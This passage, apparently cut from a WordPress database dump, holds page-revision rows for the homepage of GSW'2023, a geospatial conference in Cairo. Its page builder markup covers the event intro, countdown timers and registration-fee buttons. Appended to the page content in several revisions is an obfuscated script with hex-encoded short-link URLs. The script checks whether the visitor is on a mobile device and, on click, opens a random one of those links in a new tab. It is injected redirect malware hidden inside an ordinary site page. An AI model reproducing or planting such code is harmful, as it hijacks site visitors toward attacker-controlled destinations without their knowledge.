74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-08 23:34:26','2022-11-08 23:34:26','',3066,'https://gsw2023.com/?p=3116',0,'revision','',0),
(3118,1,'2022-11-08 23:38:29','2022-11-08 23:38:29','[vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<h3>EGYPT GSW\'2023</h3>\r\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\"][/vc_column_inner][vc_column_inner width=\"3/4\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-08 23:38:29','2022-11-08 23:38:29','',3066,'https://gsw2023.com/?p=3118',0,'revision','',0),
(3119,1,'2022-11-09 14:48:55','2022-11-09 14:48:55','<p>[vc_row][vc_column width=\"1/2\"][vc_column_text]</p>\n<h3>EGYPT GSW\'2023</h3>\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\" awb_type=\"color\" awb_color=\"#81d742\"][vc_row_inner css=\".vc_custom_1668005291201{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\"][/vc_column_inner][vc_column_inner width=\"3/4\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" 